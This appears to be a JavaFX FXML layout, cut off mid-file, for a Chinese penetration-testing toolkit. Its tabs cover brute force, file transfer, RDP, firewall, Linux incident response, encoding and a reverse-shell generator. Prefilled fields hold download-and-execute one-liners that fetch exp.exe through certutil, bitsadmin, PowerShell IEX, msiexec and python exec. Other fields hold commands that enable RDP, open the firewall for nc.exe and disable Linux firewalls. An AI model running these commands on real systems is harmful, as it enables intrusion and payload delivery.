2237 lines
209 KiB
XML
2237 lines
209 KiB
XML
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
||
<?import javafx.geometry.Insets?>
|
||
<?import javafx.scene.Cursor?>
|
||
<?import javafx.scene.control.Button?>
|
||
<?import javafx.scene.control.ComboBox?>
|
||
<?import javafx.scene.control.Label?>
|
||
<?import javafx.scene.control.Menu?>
|
||
<?import javafx.scene.control.MenuBar?>
|
||
<?import javafx.scene.control.MenuItem?>
|
||
<?import javafx.scene.control.RadioButton?>
|
||
<?import javafx.scene.control.ScrollPane?>
|
||
<?import javafx.scene.control.Tab?>
|
||
<?import javafx.scene.control.TabPane?>
|
||
<?import javafx.scene.control.TableColumn?>
|
||
<?import javafx.scene.control.TableView?>
|
||
<?import javafx.scene.control.TextArea?>
|
||
<?import javafx.scene.control.TextField?>
|
||
<?import javafx.scene.control.TitledPane?>
|
||
<?import javafx.scene.control.ToggleGroup?>
|
||
<?import javafx.scene.effect.Bloom?>
|
||
<?import javafx.scene.layout.BorderPane?>
|
||
<?import javafx.scene.layout.HBox?>
|
||
<?import javafx.scene.layout.VBox?>
|
||
<?import javafx.scene.paint.LinearGradient?>
|
||
<?import javafx.scene.paint.RadialGradient?>
|
||
<?import javafx.scene.paint.Stop?>
|
||
<?import javafx.scene.text.Font?>
|
||
<?import javafx.scene.web.WebView?>
|
||
|
||
<VBox maxHeight="-Infinity" maxWidth="-Infinity" minHeight="-Infinity" minWidth="-Infinity" prefHeight="800.0" prefWidth="1000.0" xmlns="http://javafx.com/javafx/8.0.171" xmlns:fx="http://javafx.com/fxml/1" fx:controller="com.sec421.controller.ui.MainController">
|
||
<children>
|
||
<MenuBar>
|
||
<menus>
|
||
<Menu mnemonicParsing="false" text="设置">
|
||
<items>
|
||
<MenuItem fx:id="proxySetupBtn" mnemonicParsing="false" text="代理" />
|
||
<MenuItem fx:id="api_setting" mnemonicParsing="false" text="API配置" />
|
||
</items>
|
||
</Menu>
|
||
<Menu mnemonicParsing="false" text="关于">
|
||
<items>
|
||
<MenuItem mnemonicParsing="false" onAction="#about" text="关于" />
|
||
</items>
|
||
</Menu>
|
||
<Menu mnemonicParsing="false" text="更新日志">
|
||
<items>
|
||
<MenuItem mnemonicParsing="false" onAction="#update" text="更新日志" />
|
||
</items>
|
||
</Menu>
|
||
</menus>
|
||
</MenuBar>
|
||
<TabPane maxHeight="1.7976931348623157E308" maxWidth="1.7976931348623157E308" prefHeight="800.0" prefWidth="990.0" tabClosingPolicy="ALL_TABS">
|
||
<tabs>
|
||
<Tab closable="false" style="-fx-text-color: #FFFFFF;" text="基本工具">
|
||
<content>
|
||
<VBox>
|
||
<children>
|
||
<HBox prefHeight="750.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<TabPane prefHeight="745.0" prefWidth="990.0" tabClosingPolicy="ALL_TABS">
|
||
<tabs>
|
||
<Tab closable="false" text="常用命令">
|
||
<content>
|
||
<HBox prefHeight="750.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<TabPane prefHeight="745.0" prefWidth="990.0" tabClosingPolicy="ALL_TABS">
|
||
<tabs>
|
||
<Tab closable="false" text="爆破专用">
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="40.0" prefWidth="988.0" spacing="8.0">
|
||
<children>
|
||
<Label text="目标ip" textFill="#eb0000">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<HBox.margin>
|
||
<Insets top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aaaTextField" prefHeight="29.0" prefWidth="293.0" promptText="ip/域名">
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Button fx:id="aaaBtn" mnemonicParsing="false" onAction="#aaaBtn" prefHeight="25.0" prefWidth="128.0" text="点击生成" textFill="RED">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<graphic>
|
||
<VBox />
|
||
</graphic>
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</Button>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<TextArea fx:id="aaaTextArea" prefHeight="550.0" prefWidth="990.0">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="文件上传">
|
||
<content>
|
||
<ScrollPane>
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="40.0" prefWidth="988.0" spacing="8.0">
|
||
<children>
|
||
<TextField fx:id="aabip" prefHeight="29.0" prefWidth="200.0" promptText="127.0.0.1" text="127.0.0.1">
|
||
<HBox.margin>
|
||
<Insets left="6.0" top="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<TextField fx:id="aabport" prefHeight="29.0" prefWidth="200.0" promptText="8000" text="8000">
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<TextField fx:id="aabsrcfile" prefHeight="29.0" prefWidth="200.0" promptText="exp.exe" text="exp.exe">
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<TextField fx:id="aabdstfile" prefHeight="29.0" prefWidth="200.0" promptText="windows.exe" text="windows.exe">
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Button fx:id="aabBtn" mnemonicParsing="false" onAction="#aabBtn" prefHeight="25.0" prefWidth="128.0" text="点击生成" textFill="RED">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<graphic>
|
||
<VBox />
|
||
</graphic>
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</Button>
|
||
</children>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text="python2 http " textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="15.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput1" prefHeight="29.0" prefWidth="820.0" promptText="python2 -m SimpleHTTPServer 8000" text="python2 -m SimpleHTTPServer 8000">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text="python3 http " textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="15.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput2" prefHeight="29.0" prefWidth="820.0" promptText="python3 -m http.server 8000" text="python3 -m http.server 8000">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text=" Python FTP " textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="15.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput3" prefHeight="29.0" prefWidth="820.0" promptText="python -m pyftpdlib -p 8000" text="python -m pyftpdlib -p 8000">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text="Python3 SMB " textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="15.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput4" prefHeight="29.0" prefWidth="820.0" promptText="python3 impacket-smbserver.py files . -port 8000" text="python3 impacket-smbserver.py files . -port 8000">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text="PowerShell IWR" textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput5" prefHeight="29.0" prefWidth="820.0" promptText="powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8000/exp.exe -OutFile windows.exe"" text="powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8000/exp.exe -OutFile windows.exe"">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text="PowerShell IEX" textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput6" prefHeight="29.0" prefWidth="820.0" promptText="powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8000/exp.exe', windows.exe)"" text="powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8000/exp.exe', windows.exe)"">
|
||
<HBox.margin>
|
||
<Insets left="12.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text=" Certutil" textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput7" prefHeight="29.0" prefWidth="820.0" promptText="certutil.exe -urlcache -split -f http://127.0.0.1:8000/exp.exe windows.exe" text="certutil.exe -urlcache -split -f http://127.0.0.1:8000/exp.exe windows.exe">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text=" cmd - SMB" textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput8" prefHeight="29.0" prefWidth="820.0" promptText="copy \\127.0.0.1\files\exp.exe windows.exe" text="copy \\127.0.0.1\files\exp.exe windows.exe">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text=" linux - wget " textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput9" prefHeight="29.0" prefWidth="820.0" promptText="wget http://127.0.0.1:8000/exp.exe -O windows.exe" text="wget http://127.0.0.1:8000/exp.exe -O windows.exe">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text=" linux - curl " textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput10" prefHeight="29.0" prefWidth="820.0" promptText="curl http://127.0.0.1:8000/exp.exe -o windows.exe" text="curl http://127.0.0.1:8000/exp.exe -o windows.exe">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text="win -Bitsadmin" textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput11" prefHeight="29.0" prefWidth="820.0" promptText="bitsadmin /rawreturn /transfer down "http://127.0.0.1:8000/exp.exe" c:\\windows.exe" text="bitsadmin /rawreturn /transfer down "http://127.0.0.1:8000/exp.exe" c:\\windows.exe">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text=" win - msiexec " textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput12" prefHeight="29.0" prefWidth="820.0" promptText="msiexec /q /i http://127.0.0.1:8000/exp.exe" text="msiexec /q /i http://127.0.0.1:8000/exp.exe">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text=" PY Download " textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput13" prefHeight="29.0" prefWidth="820.0" promptText="python -c "import urllib2; exec urllib2.urlopen('http://127.0.0.1:8000/exp.exe').read();"" text="python -c "import urllib2; exec urllib2.urlopen('http://127.0.0.1:8000/exp.exe').read();"">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label text=" win - IPC$ " textAlignment="RIGHT">
|
||
<HBox.margin>
|
||
<Insets left="12.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="aabInput14" prefHeight="29.0" prefWidth="820.0" promptText="copy \127.0.0.1\c$\exp.exe C:\windows.exe" text="copy \127.0.0.1\c$\exp.exe C:\windows.exe">
|
||
<HBox.margin>
|
||
<Insets left="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</ScrollPane>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="RDP相关">
|
||
<content>
|
||
<ScrollPane>
|
||
<content>
|
||
<VBox prefHeight="572.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="查询系统是否允许3389远程连接">
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.5" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="69.0" prefWidth="970.0" text="REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections 1表示关闭,0表示开启">
|
||
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
<Label text="查看远程连接的端口">
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.5" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#ff8300" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="65.0" prefWidth="970.0" text="REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber">
|
||
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
<Label text="本机开启3389远程连接的方法 - cmd">
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.5" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="RED" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="85.0" prefWidth="970.0" text="REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f">
|
||
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
<Label text="本机开启3389远程连接的方法 - 注册表">
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.5" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#00d33f" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="186.0" prefWidth="970.0" text="内容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] "PortNumber"=dword:00000d3d 导入注册表: regedit /s a.reg">
|
||
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</ScrollPane>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="防火墙相关">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="2003及之前的版本,允许指定的程序进行全部的连接">
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.5" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="19.0" prefWidth="970.0" text="netsh firewall add allowedprogram c:\nc.exe "allownc" enable">
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
<Label text="2003之后的版本,允许指定的程序进行全部的连接">
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.5" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#ff8300" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="40.0" prefWidth="970.0" text="netsh advfirewall firewall add rule name="pass nc"dir=in action=allow program="C:\nc.exe"">
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
<Label text="允许指定程序出站方向上进行网络通信">
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.5" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="RED" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="0.0" prefWidth="970.0" text="netsh advfirewall firewall add rule name="Allownc" dir=out action=allow program="C: \nc.exe" ">
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
<Label text="允许3389端口放行">
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.5" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#00d33f" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="40.0" prefWidth="970.0" text="netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow">
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
<Label text="Linux关闭防火墙">
|
||
<VBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.8898305084745763" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#fc0000" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="190.0" prefWidth="970.0" text="Ubuntu / Debian sudo ufw disable CentOS / Fedora / RHEL sudo systemctl stop firewalld sudo systemctl disable firewalld Arch Linux sudo systemctl stop iptables sudo systemctl disable iptables openSUSE sudo systemctl stop SuSEfirewall2 sudo systemctl disable SuSEfirewall2 Gentoo sudo rc-update delete iptables default sudo /etc/init.d/iptables stop Slackware sudo /etc/rc.d/rc.firewall stop Alpine Linux sudo /etc/init.d/iptables stop sudo rc-update del iptables">
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="Linux应急">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<TitledPane ellipsisString="" text="常用命令">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<Label>
|
||
<textFill>
|
||
<RadialGradient centerX="0.8898305084745763" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#fc0000" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="546.0" prefWidth="970.0" text="查看Linux中占用资源情况 top -c -o %CPU cpu占用前5的信息 ps -eo pid,ppid,%mem,%cpu,cmd --sort=-%cpu | head -n 5 查看网络通信的情况 lsof -i -PnR 寻找pid对应的进程 ps aux | grep [pid] 查看进程打开的文件 lsof -p [pid] 查看网络和端口情况 netstat -utnpl 显示进程和端口的对应关系 lsof -i :[port] 某个pid对应的文件路径 ls -l /proc/[pid]/exe file /proc/[pid]/exe 使用iptables屏蔽ip iptables -A INPUT/OUTPUT -s/d [目标ip] -j ACCEPT/DROP 用iptables封锁和x.com的域名通信 iptables -I INPUT -p tcp --dport 80 -m string --string "x.com" --algo bm -j DROP 进行对比两个进程 ps -ef | awk '{print}' | sort -n | uniq >1 ls /proc | sort -n | uniq >2 diff 1 2 特殊权限文件查找 find / *.jsp -perm 4777 被入侵的系统,肯定有文件被改动,通过比较文件的md5,创建时间,文件路径 find / -uid 0 -print 查找特权文件 find / -size +10000k -print find / -name "..." -print md5sum -b [文件名] whereis [文件名] 账号检查 w 查看系统信息 cat /etc/passwd 用户信息文件 cat /etc/shadow 用户密码 less /etc/passwd ls -l /etc/passwd 查看文件修改时间 usermod -L [user] 锁定用户 -U 解锁用户 userdel [user] 删除用户 userdel -r [user] 删除用户和他的home 用户登录检查 last lastb">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
</tabs>
|
||
<padding>
|
||
<Insets bottom="5.0" />
|
||
</padding>
|
||
<opaqueInsets>
|
||
<Insets />
|
||
</opaqueInsets>
|
||
<cursor>
|
||
<Cursor fx:constant="DEFAULT" />
|
||
</cursor>
|
||
<effect>
|
||
<Bloom threshold="1.0" />
|
||
</effect>
|
||
</TabPane>
|
||
</children>
|
||
<padding>
|
||
<Insets top="10.0" />
|
||
</padding>
|
||
</HBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="编码转码">
|
||
<content>
|
||
<VBox>
|
||
<children>
|
||
<TextArea fx:id="abTextArea1" prefHeight="357.0" prefWidth="990.0" promptText="请输入待编码内容">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
<HBox prefHeight="44.0" prefWidth="1000.0" spacing="10.0">
|
||
<children>
|
||
<ComboBox fx:id="abComboBox" prefHeight="29.0" prefWidth="241.0" promptText="-----请选择编码方式------">
|
||
<HBox.margin>
|
||
<Insets left="100.0" />
|
||
</HBox.margin>
|
||
</ComboBox>
|
||
<Button fx:id="abencodeBtn" mnemonicParsing="false" onAction="#abencodeBtn" prefHeight="25.0" prefWidth="92.0" text="↓编码↓">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
</Button>
|
||
<Button fx:id="abdecodeBtn" mnemonicParsing="false" onAction="#abdecodeBtn" prefHeight="25.0" prefWidth="92.0" text="↑解码↑">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
</Button>
|
||
</children>
|
||
<padding>
|
||
<Insets bottom="5.0" top="5.0" />
|
||
</padding>
|
||
<VBox.margin>
|
||
<Insets top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<TextArea fx:id="abTextArea2" prefHeight="460.0" prefWidth="970.0" promptText="请输入待解码内容">
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="反弹shell">
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="40.0" prefWidth="988.0" spacing="8.0">
|
||
<children>
|
||
<Label text="目标ip" textFill="#eb0000">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<HBox.margin>
|
||
<Insets top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="acTextField1" prefHeight="29.0" prefWidth="293.0" promptText="127.0.0.1" text="127.0.0.1">
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="目标port" textFill="#eb0000">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<HBox.margin>
|
||
<Insets top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="acTextField2" prefHeight="29.0" prefWidth="293.0" promptText="8080" text="8080">
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Button fx:id="acBtn" mnemonicParsing="false" onAction="#acBtn" prefHeight="25.0" prefWidth="128.0" text="点击生成" textFill="RED">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<graphic>
|
||
<VBox />
|
||
</graphic>
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
